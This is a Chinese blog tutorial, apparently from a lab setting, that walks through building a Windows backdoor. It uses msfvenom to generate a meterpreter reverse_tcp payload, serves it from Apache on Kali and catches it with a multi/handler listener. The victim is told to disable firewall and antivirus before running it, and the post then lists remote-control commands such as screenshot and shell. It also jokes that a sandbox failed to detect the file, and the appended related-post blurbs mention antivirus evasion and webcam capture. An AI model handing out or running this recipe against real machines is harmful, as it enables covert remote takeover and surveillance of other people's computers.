利用Msfvenom实现对Windows的远程控制

原创 于 2024-10-26 23:11:55 发布 · 1k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #msfvenom #kali #远程控制

1.实验准备

kali安装 Apache2(如果尚未安装)

sudo apt install apache2

启动 Apache2 服务

sudo systemctl start apache2

确认 Apache2 的默认网页可以访问

打开浏览器并访问 http://<你的Kali IP>,检查是否显示 Apache2 默认页面。

2.msf远控生成

(1)在kali运行msf生成exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali_ip LPORT=5000 -f exe -o /root/payload.exe

将kali_ip填好自己对应的ip地址,结果如下:

(2)将有效载荷文件复制到 Apache 的根目录

sudo cp /root/payload.exe /var/www/html/
 

(3) 设置 Metasploit 监听器

启动 Metasploit 控制台

msfconsole

使用多重处理程序

use exploit/multi/handler

设置有效载荷

set payload windows/meterpreter/reverse_tcp

设置 LHOST 和 LPORT

set LHOST <你的Kali IP>
set LPORT 5000

启动监听器

exploit

 

3.win11本地进行下载

在 Windows 上下载并运行有效载荷

在 Windows 上打开浏览器,输入以下地址:

http://<你的Kali IP>/payload.exe

 

要注意这里记得关闭自己本地的防火墙以及杀毒软件

4.远控实现以及命令

使用 Meterpreter 会话进行操作
  • 你可以使用以下命令进行远程控制:
    • sysinfo:获取目标系统信息。
    • screenshot:截取屏幕。
    • shell:获取系统 shell。

但是如上图所示,win11的安全会对返回的信息进行加密

5.沙箱检测exe

这里比较有点难崩,是在是忍不住笑了出来,因为exe已经把win11拿下来了都,结果腾讯安全这边没分析出来风险文件。

这下真成了年度笑话了,希望有关部门早日修改一手,哈哈。

 地址:

 最后还得是•​​​​​​www.virustotal.com

 

希望我的文章能够帮助大家,感谢大家!

补天阁
关注
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实现远程控制目标系统。此过程分为多个步骤: 首先,确保实验环境的准备,包括启动Kali Linux和Windows 7的...
利用msfvenom渗透win7
CODING...
11-12 1万+
msfvenomkali linux下一个可以产生自定义payload的程序,接下来我们利用msfvenom产生一个新的win7下的计算器后门程序,利用windows/meterpreter/reverse_tcp来对目标靶机windows7进行控制。
msfvenom生成木马-windows
aheyor的博客
10-22 755
通常使用 Kali Linux(例如 Kali 2021.3)作为攻击系统,目标靶机为 Windows 10 专业版。请注意,这些步骤仅适用于合法的安全测试和学习目的。未经授权使用这些技术侵犯他人计算机系统是非法的。是 Metasploit 框架中的一个独立有效载荷生成器,它是。的替代品,用于生成后门程序。
利用msfvenom制作windows木马及免杀马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 1148
Kali 2中生成被控端的工具:msfvenommsfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
使用msfvenom生成被控端并进行远程控制
2301_78429157的博客
06-29 694
传送payload 将生成的payload文件(payload.exe)传送到目标机器上。在网络安全领域中,远程控制是一项常见的技术,它允许安全专业人员模拟攻击并评估系统的安全性。远程控制 一旦连接建立成功,你将获得一个Meterpreter Shell,可以在目标机器上执行各种操作和命令。执行payload 在目标机器上执行payload文件。一旦执行成功,它将尝试连接本地机器上的Metasploit监听器。生成payload 首先,我们需要使用msfvenom生成恶意的payload。
通过MSFVenom生成Shellcode以实现远程控制
它是渗透测试和漏洞利用中的利器,可以用于远程控制、渗透测试和漏洞利用。 #### 1.2 MSFVenom的主要特性 MSFVenom的特性包括多种Payload选项、丰富的数据格式支持、自定义参数选项和灵活的生成方式等。它可以生成...
如何使用msfvenom生成被控端并进行远程控制
Hotumn的博客
06-26 714
Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具,它其实是MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控端。在KaliLinux2中提供了多个可以用来生成远程控制被控端的命令,其中较为简单且强大的命令为msfvenom命令,MSFPC命令其实也是经过包装的msfvenom命令。msfvenom命令是渗透测试工具Metasploit中的一个命令,但是我们可以直接在。
msfvenom的使用
A_Z_dd的博客
06-01 899
娱乐身心即可
msfvenom介绍
weixin_46483815的博客
05-11 3245
主要介绍msfvenom 和一些实验
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
msfvenom
weixin_54472394的博客
06-14 794
1, msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.55 lport=4444 -f exe > /root/shell.exe 2,use exploit/multi/handler 监听模块
Msfvenom的使用
Beret-81的博客
03-12 1326
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo的博客
03-02 7988
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
网络攻防作业——Msfvenom的使用
yyy7654321的博客
06-28 4433
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
使用msfvenom远程控制
m0_68638628的博客
06-29 1415
msfvenommsfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控端winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控端payload.exe生成到/var/payload.exe。
msfvenom生成远程木马控制电脑
weixin_48886225的博客
12-07 1432
使用msfvenom生成木马控制电脑
如何利用kali远程控制window10
最新发布
01-16
### 使用Kali Linux远程控制Windows 10 #### 启用RDP服务 要在Windows 10上实现来自Kali Linux的远程桌面访问,需先激活远程桌面协议(RDP)功能。这可以通过进入设置中的“系统”部分找到“关于”,点击右侧链接开启...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值